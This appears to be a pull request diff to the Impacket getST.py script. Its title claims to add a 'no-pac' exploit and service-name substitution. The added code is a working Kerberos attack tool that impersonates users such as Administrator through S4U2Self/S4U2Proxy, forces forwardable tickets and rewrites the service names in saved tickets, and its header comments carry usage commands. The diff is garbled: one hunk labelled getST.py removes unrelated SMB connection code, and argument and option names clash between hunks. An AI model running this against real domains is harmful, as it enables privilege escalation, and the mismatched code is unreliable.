### PR TITLE
add no-pac exploit attack (s4u2self only) and add service modification feature to examples/getST.py

### DIFF
--- a/examples/getST.py
+++ b/examples/getST.py
@@ -298,7 +298,7 @@ class GETST:
 
             return r, cipher, sessionKey, newSessionKey
 
-    def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, s4u2self=False):
+    def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost):
         decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
         # Extract the ticket from the TGT
         ticket = Ticket()

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -676,7 +676,7 @@ class GETST:
                 return
             self.__saveFileName = self.__options.impersonate
 
-        self.saveTicket(tgs, oldSessionKey)
+        self.saveTicket(tgs, oldSessionKey, options.alt_service)
 
 
 if __name__ == '__main__':

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -1,3 +1,4 @@
+#!/usr/bin/env python
 # Impacket - Collection of Python classes for working with network protocols.
 #
 # SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
@@ -7,1023 +8,795 @@
 # for more information.
 #
 # Description:
-#   Wrapper class for SMB1/2/3 so it's transparent for the client.
-#   You can still play with the low level methods (version dependent)
-#   by calling getSMBServer()
+#   Given a password, hash, aesKey or TGT in ccache, it will request a Service Ticket and save it as ccache
+#   If the account has constrained delegation (with protocol transition) privileges you will be able to use
+#   the -impersonate switch to request the ticket on behalf other user (it will use S4U2Self/S4U2Proxy to
+#   request the ticket.)
 #
-# Author: Alberto Solino (@agsolino)
+#   Similar feature has been implemented already by Benjamin Delphi (@gentilkiwi) in Kekeo (s4u)
+#
+#   Examples:
+#       ./getST.py -hashes lm:nt -spn cifs/contoso-dc contoso.com/user
+#   or
+#   If you have tickets cached (run klist to verify) the script will use them
+#         ./getST.py -k -spn cifs/contoso-dc contoso.com/user
+#   Be sure tho, that the cached TGT has the forwardable flag set (klist -f). getTGT.py will ask forwardable tickets
+#   by default.
+#
+#   Also, if the account is configured with constrained delegation (with protocol transition) you can request
+#   service tickets for other users, assuming the target SPN is allowed for delegation:
+#         ./getST.py -k -impersonate Administrator -spn cifs/contoso-dc contoso.com/user
+#
+#   The output of this script will be a service ticket for the Administrator user.
+#
+#   Once you have the ccache file, set it in the KRB5CCNAME variable and use it for fun and profit.
+#
+# Author:
+#   Alberto Solino (@agsolino)
 #
 
-import ntpath
-import socket
+from __future__ import division
+from __future__ import print_function
+import argparse
+import datetime
+import logging
+import os
+import random
+import struct
+import sys
+from binascii import hexlify, unhexlify
+from six import b
 
-from impacket import smb, smb3, nmb, nt_errors, LOG
-from impacket.ntlm import compute_lmhash, compute_nthash
-from impacket.smb3structs import SMB2Packet, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, GENERIC_ALL, FILE_SHARE_READ, \
-    FILE_SHARE_WRITE, FILE_SHARE_DELETE, FILE_NON_DIRECTORY_FILE, FILE_OVERWRITE_IF, FILE_ATTRIBUTE_NORMAL, \
-    SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE, FILE_READ_DATA , FILE_WRITE_DATA, FILE_OPEN, GENERIC_READ, GENERIC_WRITE, \
-    FILE_OPEN_REPARSE_POINT, MOUNT_POINT_REPARSE_DATA_STRUCTURE, FSCTL_SET_REPARSE_POINT, SMB2_0_IOCTL_IS_FSCTL, \
-    MOUNT_POINT_REPARSE_GUID_DATA_STRUCTURE, FSCTL_DELETE_REPARSE_POINT, FSCTL_SRV_ENUMERATE_SNAPSHOTS, SRV_SNAPSHOT_ARRAY, \
-    FILE_SYNCHRONOUS_IO_NONALERT, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, SMB2_DIALECT_311
+from pyasn1.codec.der import decoder, encoder
+from pyasn1.type.univ import noValue
+
+from impacket import version
+from impacket.examples import logger
+from impacket.examples.utils import parse_credentials
+from impacket.krb5 import constants
+from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
+    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart
+from impacket.krb5.ccache import CCache
+from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype
+from impacket.krb5.constants import TicketFlags, encodeFlags
+from impacket.krb5.kerberosv5 import getKerberosTGS
+from impacket.krb5.kerberosv5 import getKerberosTGT, sendReceive
+from impacket.krb5.types import Principal, KerberosTime, Ticket
+from impacket.ntlm import compute_nthash
+from impacket.winregistry import hexdump
 
 
-# So the user doesn't need to import smb, the smb3 are already in here
-SMB_DIALECT = smb.SMB_DIALECT
+class GETST:
+    def __init__(self, target, password, domain, options):
+        self.__password = password
+        self.__user = target
+        self.__domain = domain
+        self.__lmhash = ''
+        self.__nthash = ''
+        self.__aesKey = options.aesKey
+        self.__options = options
+        self.__kdcHost = options.dc_ip
+        self.__force_forwardable = options.force_forwardable
+        self.__additional_ticket = options.additional_ticket
+        self.__saveFileName = None
+        self.__no_s4u2proxy = options.no_s4u2proxy
+        self.__alt_service = options.altservice
+        if options.hashes is not None:
+            self.__lmhash, self.__nthash = options.hashes.split(':')
 
-class SMBConnection:
-    """
-    SMBConnection class
+    def saveTicket(self, ticket, sessionKey):
+        logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
+        ccache = CCache()
 
-    :param string remoteName: name of the remote host, can be its NETBIOS name, IP or *\\*SMBSERVER*.  If the later,
-           and port is 139, the library will try to get the target's server name.
-    :param string remoteHost: target server's remote address (IPv4, IPv6) or FQDN
-    :param string/optional myName: client's NETBIOS name
-    :param integer/optional sess_port: target port to connect
-    :param integer/optional timeout: timeout in seconds when receiving packets
-    :param optional preferredDialect: the dialect desired to talk with the target server. If not specified the highest
-           one available will be used
-    :param optional boolean manualNegotiate: the user manually performs SMB_COM_NEGOTIATE
+        ccache.fromTGS(ticket, sessionKey, sessionKey)
+        if self.__alt_service != None:
+            self.substitute_sname(ccache)
+        ccache.saveFile(self.__saveFileName + '.ccache')
 
-    :return: a SMBConnection instance, if not raises a SessionError exception
-    """
-
-    def __init__(self, remoteName='', remoteHost='', myName=None, sess_port=nmb.SMB_SESSION_PORT, timeout=60, preferredDialect=None,
-                 existingConnection=None, manualNegotiate=False):
-
-        self._SMBConnection = 0
-        self._dialect       = ''
-        self._nmbSession    = 0
-        self._sess_port     = sess_port
-        self._myName        = myName
-        self._remoteHost    = remoteHost
-        self._remoteName    = remoteName
-        self._timeout       = timeout
-        self._preferredDialect = preferredDialect
-        self._existingConnection = existingConnection
-        self._manualNegotiate = manualNegotiate
-        self._doKerberos = False
-        self._kdcHost = None
-        self._useCache = True
-        self._ntlmFallback = True
-
-        if existingConnection is not None:
-            # Existing Connection must be a smb or smb3 instance
-            assert ( isinstance(existingConnection,smb.SMB) or isinstance(existingConnection, smb3.SMB3))
-            self._SMBConnection = existingConnection
-            self._preferredDialect = self._SMBConnection.getDialect()
-            self._doKerberos = self._SMBConnection.getKerberos()
-            return
-
-        ##preferredDialect = smb.SMB_DIALECT
-
-        if manualNegotiate is False:
-            self.negotiateSession(preferredDialect)
-
-    def negotiateSession(self, preferredDialect=None,
-                         flags1=smb.SMB.FLAGS1_PATHCASELESS | smb.SMB.FLAGS1_CANONICALIZED_PATHS,
-                         flags2=smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES,
-                         negoData='\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00'):
-        """
-        Perform protocol negotiation
-
-        :param string preferredDialect: the dialect desired to talk with the target server. If None is specified the highest one available will be used
-        :param string flags1: the SMB FLAGS capabilities
-        :param string flags2: the SMB FLAGS2 capabilities
-        :param string negoData: data to be sent as part of the nego handshake
-
-        :return: True
-        :raise SessionError: if error
-        """
-
-        # If port 445 and the name sent is *SMBSERVER we're setting the name to the IP. This is to help some old
-        # applications still believing
-        # *SMSBSERVER will work against modern OSes. If port is NETBIOS_SESSION_PORT the user better know about i
-        # *SMBSERVER's limitations
-        if self._sess_port == nmb.SMB_SESSION_PORT and self._remoteName == '*SMBSERVER':
-            self._remoteName = self._remoteHost
-        elif self._sess_port == nmb.NETBIOS_SESSION_PORT and self._remoteName == '*SMBSERVER':
-            # If remote name is *SMBSERVER let's try to query its name.. if can't be guessed, continue and hope for the best
-            nb = nmb.NetBIOS()
-            try:
-                res = nb.getnetbiosname(self._remoteHost)
-            except:
-                pass
+    def substitute_sname(self, ccache):
+        cred_number = 0
+        logging.info('Number of credentials in cache: %d' % len(ccache.credentials))
+        if cred_number > 1:
+            logging.debug("More than one credentials in cache, modifying all of them")
+        for creds in ccache.credentials:
+            sname = creds['server'].prettyPrint()
+            if len(sname.split(b'@')[0].split(b'/')) == 2:
+                hostname = sname.split(b'@')[0].split(b'/')[1].decode('utf-8')
             else:
-                self._remoteName = res
-
-        if self._sess_port == nmb.NETBIOS_SESSION_PORT:
-            negoData = '\x02NT LM 0.12\x00\x02SMB 2.002\x00'
-
-        hostType = nmb.TYPE_SERVER
-        if preferredDialect is None:
-            # If no preferredDialect sent, we try the highest available one.
-            packet = self.negotiateSessionWildcard(self._myName, self._remoteName, self._remoteHost, self._sess_port,
-                                                   self._timeout, True, flags1=flags1, flags2=flags2, data=negoData)
-            if packet[0:1] == b'\xfe':
-                # Answer is SMB2 packet
-                self._SMBConnection = smb3.SMB3(self._remoteName, self._remoteHost, self._myName, hostType,
-                                                self._sess_port, self._timeout, session=self._nmbSession,
-                                                negSessionResponse=SMB2Packet(packet))
-            else:
-                # Answer is SMB packet, sticking to SMBv1
-                self._SMBConnection = smb.SMB(self._remoteName, self._remoteHost, self._myName, hostType,
-                                              self._sess_port, self._timeout, session=self._nmbSession,
-                                              negPacket=packet)
-        else:
-            if preferredDialect == smb.SMB_DIALECT:
-                self._SMBConnection = smb.SMB(self._remoteName, self._remoteHost, self._myName, hostType,
-                                              self._sess_port, self._timeout)
-            elif preferredDialect in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, SMB2_DIALECT_311]:
-                self._SMBConnection = smb3.SMB3(self._remoteName, self._remoteHost, self._myName, hostType,
-                                                self._sess_port, self._timeout, preferredDialect=preferredDialect)
-            else:
-                raise Exception("Unknown dialect %s")
-
-        # propagate flags to the smb sub-object, except for Unicode (if server supports)
-        # does not affect smb3 objects
-        if isinstance(self._SMBConnection, smb.SMB):
-            if self._SMBConnection.get_flags()[1] & smb.SMB.FLAGS2_UNICODE:
-                flags2 |= smb.SMB.FLAGS2_UNICODE
-            self._SMBConnection.set_flags(flags1=flags1, flags2=flags2)
-
-        return True
-
-    def negotiateSessionWildcard(self, myName, remoteName, remoteHost, sess_port, timeout, extended_security=True, flags1=0,
-                                 flags2=0, data=None):
-        # Here we follow [MS-SMB2] negotiation handshake trying to understand what dialects
-        # (including SMB1) is supported on the other end.
-
-        if not myName:
-            myName = socket.gethostname()
-            i = myName.find('.')
-            if i > -1:
-                myName = myName[:i]
-
-        tries = 0
-        smbp = smb.NewSMBPacket()
-        smbp['Flags1'] = flags1
-        # FLAGS2_UNICODE is required by some stacks to continue, regardless of subsequent support
-        smbp['Flags2'] = flags2 | smb.SMB.FLAGS2_UNICODE
-        resp = None
-        while tries < 2:
-            self._nmbSession = nmb.NetBIOSTCPSession(myName, remoteName, remoteHost, nmb.TYPE_SERVER, sess_port,
-                                                     timeout)
-
-            negSession = smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)
-            if extended_security is True:
-                smbp['Flags2'] |= smb.SMB.FLAGS2_EXTENDED_SECURITY
-            negSession['Data'] = data
-            smbp.addCommand(negSession)
-            self._nmbSession.send_packet(smbp.getData())
-
-            try:
-                resp = self._nmbSession.recv_packet(timeout)
-                break
-            except nmb.NetBIOSError:
-                # OSX Yosemite asks for more Flags. Let's give it a try and see what happens
-                smbp['Flags2'] |= smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | smb.SMB.FLAGS2_UNICODE
-                smbp['Data'] = []
-
-            tries += 1
-
-        if resp is None:
-            # No luck, quitting
-            raise Exception('No answer!')
-
-        return resp.get_trailer()
-
-
-    def getNMBServer(self):
-        return self._nmbSession
-
-    def getSMBServer(self):
-        """
-        returns the SMB/SMB3 instance being used. Useful for calling low level methods
-        """
-        return self._SMBConnection
-
-    def getDialect(self):
-        return self._SMBConnection.getDialect()
-
-    def getServerName(self):
-        return self._SMBConnection.get_server_name()
-
-    def getClientName(self):
-        return self._SMBConnection.get_client_name()
-
-    def getRemoteHost(self):
-        return self._SMBConnection.get_remote_host()
-
-    def getRemoteName(self):
-        return self._SMBConnection.get_remote_name()
-
-    def setRemoteName(self, name):
-        return self._SMBConnection.set_remote_name(name)
-
-    def getServerDomain(self):
-        return self._SMBConnection.get_server_domain()
-
-    def getServerDNSDomainName(self):
-        return self._SMBConnection.get_server_dns_domain_name()
-
-    def getServerDNSHostName(self):
-        return self._SMBConnection.get_server_dns_host_name()
-
-    def getServerOS(self):
-        return self._SMBConnection.get_server_os()
-
-    def getServerOSMajor(self):
-        return self._SMBConnection.get_server_os_major()
-
-    def getServerOSMinor(self):
-        return self._SMBConnection.get_server_os_minor()
-
-    def getServerOSBuild(self):
-        return self._SMBConnection.get_server_os_build()
-
-    def doesSupportNTLMv2(self):
-        return self._SMBConnection.doesSupportNTLMv2()
-
-    def isLoginRequired(self):
-        return self._SMBConnection.is_login_required()
-
-    def isSigningRequired(self):
-        return self._SMBConnection.is_signing_required()
-
-    def getCredentials(self):
-        return self._SMBConnection.getCredentials()
-
-    def getIOCapabilities(self):
-        return self._SMBConnection.getIOCapabilities()
-
-    def login(self, user, password, domain = '', lmhash = '', nthash = '', ntlmFallback = True):
-        """
-        logins into the target system
-
-        :param string user: username
-        :param string password: password for the user
-        :param string domain: domain where the account is valid for
-        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
-        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
-        :param bool ntlmFallback: If True it will try NTLMv1 authentication if NTLMv2 fails. Only available for SMBv1
-
-        :return: None
-        :raise SessionError: if error
-        """
-        self._ntlmFallback = ntlmFallback
-        try:
-            if self.getDialect() == smb.SMB_DIALECT:
-                return self._SMBConnection.login(user, password, domain, lmhash, nthash, ntlmFallback)
-            else:
-                return self._SMBConnection.login(user, password, domain, lmhash, nthash)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def kerberosLogin(self, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None,
-                      TGS=None, useCache=True):
-        """
-        logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
-
-        :param string user: username
-        :param string password: password for the user
-        :param string domain: domain where the account is valid for (required)
-        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
-        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
-        :param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
-        :param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
-        :param struct TGT: If there's a TGT available, send the structure here and it will be used
-        :param struct TGS: same for TGS. See smb3.py for the format
-        :param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
-
-        :return: None
-        :raise SessionError: if error
-        """
-        import os
-        from impacket.krb5.ccache import CCache
-        from impacket.krb5.kerberosv5 import KerberosError
-        from impacket.krb5 import constants
-
-        self._kdcHost = kdcHost
-        self._useCache = useCache
-
-        if TGT is not None or TGS is not None:
-            useCache = False
-
-        if useCache is True:
-            try:
-                ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
-            except:
-                # No cache present
-                pass
-            else:
-                LOG.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
-                # retrieve domain information from CCache file if needed
-                if domain == '':
-                    domain = ccache.principal.realm['data'].decode('utf-8')
-                    LOG.debug('Domain retrieved from CCache: %s' % domain)
-
-                principal = 'cifs/%s@%s' % (self.getRemoteName().upper(), domain.upper())
-                creds = ccache.getCredential(principal)
-                if creds is None:
-                    # Let's try for the TGT and go from there
-                    principal = 'krbtgt/%s@%s' % (domain.upper(),domain.upper())
-                    creds =  ccache.getCredential(principal)
-                    if creds is not None:
-                        TGT = creds.toTGT()
-                        LOG.debug('Using TGT from cache')
-                    else:
-                        LOG.debug("No valid credentials found in cache. ")
+                hostname = sname.split(b'@')[0].decode('utf-8')
+            service_realm = sname.split(b'@')[1].decode('utf-8')
+            if '@' in self.__alt_service:
+                new_service_realm = self.__alt_service.split('@')[1].upper()
+                if not '.' in new_service_realm:
+                    logging.debug("New service realm is not FQDN, you may encounter errors")
+                if '/' in self.__alt_service:
+                    new_hostname = self.__alt_service.split('@')[0].split('/')[1]
+                    new_service_class = self.__alt_service.split('@')[0].split('/')[0]
                 else:
-                    TGS = creds.toTGS(principal)
-                    LOG.debug('Using TGS from cache')
-
-                # retrieve user information from CCache file if needed
-                if user == '' and creds is not None:
-                    user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
-                    LOG.debug('Username retrieved from CCache: %s' % user)
-                elif user == '' and len(ccache.principal.components) > 0:
-                    user = ccache.principal.components[0]['data'].decode('utf-8')
-                    LOG.debug('Username retrieved from CCache: %s' % user)
-
-        while True:
-            try:
-                if self.getDialect() == smb.SMB_DIALECT:
-                    return self._SMBConnection.kerberos_login(user, password, domain, lmhash, nthash, aesKey, kdcHost,
-                                                              TGT, TGS)
-                return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT,
-                                                         TGS)
-            except (smb.SessionError, smb3.SessionError) as e:
-                raise SessionError(e.get_error_code(), e.get_error_packet())
-            except KerberosError as e:
-                if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
-                    # We might face this if the target does not support AES
-                    # So, if that's the case we'll force using RC4 by converting
-                    # the password to lm/nt hashes and hope for the best. If that's already
-                    # done, byebye.
-                    if lmhash == '' and nthash == '' and (aesKey == '' or aesKey is None) and TGT is None and TGS is None:
-                        lmhash = compute_lmhash(password)
-                        nthash = compute_nthash(password)
-                    else:
-                        raise e
+                    logging.debug("No service hostname in new SPN, using the current one (%s)" % hostname)
+                    new_hostname = hostname
+                    new_service_class = self.__alt_service.split('@')[0]
+            else:
+                logging.debug("No service realm in new SPN, using the current one (%s)" % service_realm)
+                new_service_realm = service_realm
+                if '/' in self.__alt_service:
+                    new_hostname = self.__alt_service.split('/')[1]
+                    new_service_class = self.__alt_service.split('/')[0]
                 else:
-                    raise e
-
-    def isGuestSession(self):
-        try:
-            return self._SMBConnection.isGuestSession()
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def logoff(self):
-        try:
-            return self._SMBConnection.logoff()
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-
-    def connectTree(self,share):
-        if self.getDialect() == smb.SMB_DIALECT:
-            # If we already have a UNC we do nothing.
-            if ntpath.ismount(share) is False:
-                # Else we build it
-                share = ntpath.basename(share)
-                share = '\\\\' + self.getRemoteHost() + '\\' + share
-        try:
-            return self._SMBConnection.connect_tree(share)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-
-    def disconnectTree(self, treeId):
-        try:
-            return self._SMBConnection.disconnect_tree(treeId)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-
-    def listShares(self):
-        """
-        get a list of available shares at the connected target
-
-        :return: a list containing dict entries for each share
-        :raise SessionError: if error
-        """
-        # Get the shares through RPC
-        from impacket.dcerpc.v5 import transport, srvs
-        rpctransport = transport.SMBTransport(self.getRemoteName(), self.getRemoteHost(), filename=r'\srvsvc',
-                                              smb_connection=self)
-        dce = rpctransport.get_dce_rpc()
-        dce.connect()
-        dce.bind(srvs.MSRPC_UUID_SRVS)
-        resp = srvs.hNetrShareEnum(dce, 1)
-        return resp['InfoStruct']['ShareInfo']['Level1']['Buffer']
-
-    def listPath(self, shareName, path, password = None):
-        """
-        list the files/directories under shareName/path
-
-        :param string shareName: a valid name for the share where the files/directories are going to be searched
-        :param string path: a base path relative to shareName
-        :param string password: the password for the share
-
-        :return: a list containing smb.SharedFile items
-        :raise SessionError: if error
-        """
-
-        try:
-            return self._SMBConnection.list_path(shareName, path, password)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def createFile(self, treeId, pathName, desiredAccess=GENERIC_ALL,
-                   shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
-                   creationOption=FILE_NON_DIRECTORY_FILE, creationDisposition=FILE_OVERWRITE_IF,
-                   fileAttributes=FILE_ATTRIBUTE_NORMAL, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
-                   oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
-        """
-        Creates a remote file
-
-        :param HANDLE treeId: a valid handle for the share where the file is to be created
-        :param string pathName: the path name of the file to create
-        :param int desiredAccess: The level of access that is required, as specified in https://msdn.microsoft.com/en-us/library/cc246503.aspx
-        :param int shareMode: Specifies the sharing mode for the open.
-        :param int creationOption: Specifies the options to be applied when creating or opening the file.
-        :param int creationDisposition: Defines the action the server MUST take if the file that is specified in the name
-        field already exists.
-        :param int fileAttributes: This field MUST be a combination of the values specified in [MS-FSCC] section 2.6, and MUST NOT include any values other than those specified in that section.
-        :param int impersonationLevel: This field specifies the impersonation level requested by the application that is issuing the create request.
-        :param int securityFlags: This field MUST NOT be used and MUST be reserved. The client MUST set this to 0, and the server MUST ignore it.
-        :param int oplockLevel: The requested oplock level
-        :param createContexts: A variable-length attribute that is sent with an SMB2 CREATE Request or SMB2 CREATE Response that either gives extra information about how the create will be processed, or returns extra information about how the create was processed.
-
-        :return: a valid file descriptor
-        :raise SessionError: if error
-        """
-        if self.getDialect() == smb.SMB_DIALECT:
-            _, flags2 = self._SMBConnection.get_flags()
-
-            pathName = pathName.replace('/', '\\')
-            packetPathName = pathName.encode('utf-16le') if flags2 & smb.SMB.FLAGS2_UNICODE else pathName
-
-            ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
-            ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
-            ntCreate['Data']       = smb.SMBNtCreateAndX_Data(flags=flags2)
-            ntCreate['Parameters']['FileNameLength']= len(packetPathName)
-            ntCreate['Parameters']['AccessMask']    = desiredAccess
-            ntCreate['Parameters']['FileAttributes']= fileAttributes
-            ntCreate['Parameters']['ShareAccess']   = shareMode
-            ntCreate['Parameters']['Disposition']   = creationDisposition
-            ntCreate['Parameters']['CreateOptions'] = creationOption
-            ntCreate['Parameters']['Impersonation'] = impersonationLevel
-            ntCreate['Parameters']['SecurityFlags'] = securityFlags
-            ntCreate['Parameters']['CreateFlags']   = 0x16
-            ntCreate['Data']['FileName'] = packetPathName
-
-            if flags2 & smb.SMB.FLAGS2_UNICODE:
-                ntCreate['Data']['Pad'] = 0x0
-
-            if createContexts is not None:
-                LOG.error("CreateContexts not supported in SMB1")
-
-            try:
-                return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate)
-            except (smb.SessionError, smb3.SessionError) as e:
-                raise SessionError(e.get_error_code(), e.get_error_packet())
+                    logging.debug("No service hostname in new SPN, using the current one (%s)" % hostname)
+                    new_hostname = hostname
+                    new_service_class = self.__alt_service
+            new_sname = "%s/%s@%s" % (new_service_class, new_hostname, new_service_realm)
+            logging.info('Changing sname from %s to %s' % (sname.decode("utf-8"), new_sname))
+            creds['server'].fromPrincipal(Principal(new_sname, type=constants.PrincipalNameType.NT_PRINCIPAL.value))
+        logging.info('Saving ticket in %s.ccache' % new_sname.replace("/", "_"))
+        ccache.saveFile(new_sname.replace("/", "_") + '.ccache')
+    def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
+        if not os.path.isfile(additional_ticket_path):
+            logging.error("Ticket %s doesn't exist" % additional_ticket_path)
+            exit(0)
         else:
-            try:
-                return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
-                                                  creationDisposition, fileAttributes, impersonationLevel,
-                                                  securityFlags, oplockLevel, createContexts)
-            except (smb.SessionError, smb3.SessionError) as e:
-                raise SessionError(e.get_error_code(), e.get_error_packet())
+            decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+            logging.info("\tUsing additional ticket %s instead of S4U2Self" % additional_ticket_path)
+            ccache = CCache.loadFile(additional_ticket_path)
+            principal = ccache.credentials[0].header['server'].prettyPrint()
+            creds = ccache.getCredential(principal.decode())
+            TGS = creds.toTGS(principal)
 
-    def openFile(self, treeId, pathName, desiredAccess=FILE_READ_DATA | FILE_WRITE_DATA, shareMode=FILE_SHARE_READ,
-                 creationOption=FILE_NON_DIRECTORY_FILE, creationDisposition=FILE_OPEN,
-                 fileAttributes=FILE_ATTRIBUTE_NORMAL, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
-                 oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
-        """
-        opens a remote file
+            tgs = decoder.decode(TGS['KDC_REP'], asn1Spec=TGS_REP())[0]
 
-        :param HANDLE treeId: a valid handle for the share where the file is to be opened
-        :param string pathName: the path name to open
-        :param int desiredAccess: The level of access that is required, as specified in https://msdn.microsoft.com/en-us/library/cc246503.aspx
-        :param int shareMode: Specifies the sharing mode for the open.
-        :param int creationOption: Specifies the options to be applied when creating or opening the file.
-        :param int creationDisposition: Defines the action the server MUST take if the file that is specified in the name
-        field already exists.
-        :param int fileAttributes: This field MUST be a combination of the values specified in [MS-FSCC] section 2.6, and MUST NOT include any values other than those specified in that section.
-        :param int impersonationLevel: This field specifies the impersonation level requested by the application that is issuing the create request.
-        :param int securityFlags: This field MUST NOT be used and MUST be reserved. The client MUST set this to 0, and the server MUST ignore it.
-        :param int oplockLevel: The requested oplock level
-        :param createContexts: A variable-length attribute that is sent with an SMB2 CREATE Request or SMB2 CREATE Response that either gives extra information about how the create will be processed, or returns extra information about how the create was processed.
+            if logging.getLogger().level == logging.DEBUG:
+                logging.debug('TGS_REP')
+                print(tgs.prettyPrint())
 
-        :return: a valid file descriptor
-        :raise SessionError: if error
-        """
+            if self.__force_forwardable:
+                # Convert hashes to binary form, just in case we're receiving strings
+                if isinstance(nthash, str):
+                    try:
+                        nthash = unhexlify(nthash)
+                    except TypeError:
+                        pass
+                if isinstance(aesKey, str):
+                    try:
+                        aesKey = unhexlify(aesKey)
+                    except TypeError:
+                        pass
 
-        if self.getDialect() == smb.SMB_DIALECT:
-            _, flags2 = self._SMBConnection.get_flags()
+                # Compute NTHash and AESKey if they're not provided in arguments
+                if self.__password != '' and self.__domain != '' and self.__user != '':
+                    if not nthash:
+                        nthash = compute_nthash(self.__password)
+                        if logging.getLogger().level == logging.DEBUG:
+                            logging.debug('NTHash')
+                            print(hexlify(nthash).decode())
+                    if not aesKey:
+                        salt = self.__domain.upper() + self.__user
+                        aesKey = _AES256CTS.string_to_key(self.__password, salt, params=None).contents
+                        if logging.getLogger().level == logging.DEBUG:
+                            logging.debug('AESKey')
+                            print(hexlify(aesKey).decode())
 
-            pathName = pathName.replace('/', '\\')
-            packetPathName = pathName.encode('utf-16le') if flags2 & smb.SMB.FLAGS2_UNICODE else pathName
+                # Get the encrypted ticket returned in the TGS. It's encrypted with one of our keys
+                cipherText = tgs['ticket']['enc-part']['cipher']
 
-            ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
-            ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
-            ntCreate['Data']       = smb.SMBNtCreateAndX_Data(flags=flags2)
-            ntCreate['Parameters']['FileNameLength']= len(packetPathName)
-            ntCreate['Parameters']['AccessMask']    = desiredAccess
-            ntCreate['Parameters']['FileAttributes']= fileAttributes
-            ntCreate['Parameters']['ShareAccess']   = shareMode
-            ntCreate['Parameters']['Disposition']   = creationDisposition
-            ntCreate['Parameters']['CreateOptions'] = creationOption
-            ntCreate['Parameters']['Impersonation'] = impersonationLevel
-            ntCreate['Parameters']['SecurityFlags'] = securityFlags
-            ntCreate['Parameters']['CreateFlags']   = 0x16
-            ntCreate['Data']['FileName'] = packetPathName
-
-            if flags2 & smb.SMB.FLAGS2_UNICODE:
-                ntCreate['Data']['Pad'] = 0x0
-
-            if createContexts is not None:
-                LOG.error("CreateContexts not supported in SMB1")
-
-            try:
-                return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate)
-            except (smb.SessionError, smb3.SessionError) as e:
-                raise SessionError(e.get_error_code(), e.get_error_packet())
-        else:
-            try:
-                return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
-                                                  creationDisposition, fileAttributes, impersonationLevel,
-                                                  securityFlags, oplockLevel, createContexts)
-            except (smb.SessionError, smb3.SessionError) as e:
-                raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def writeFile(self, treeId, fileId, data, offset=0):
-        """
-        writes data to a file
-
-        :param HANDLE treeId: a valid handle for the share where the file is to be written
-        :param HANDLE fileId: a valid handle for the file
-        :param string data: buffer with the data to write
-        :param integer offset: offset where to start writing the data
-
-        :return: amount of bytes written
-        :raise SessionError: if error
-        """
-        try:
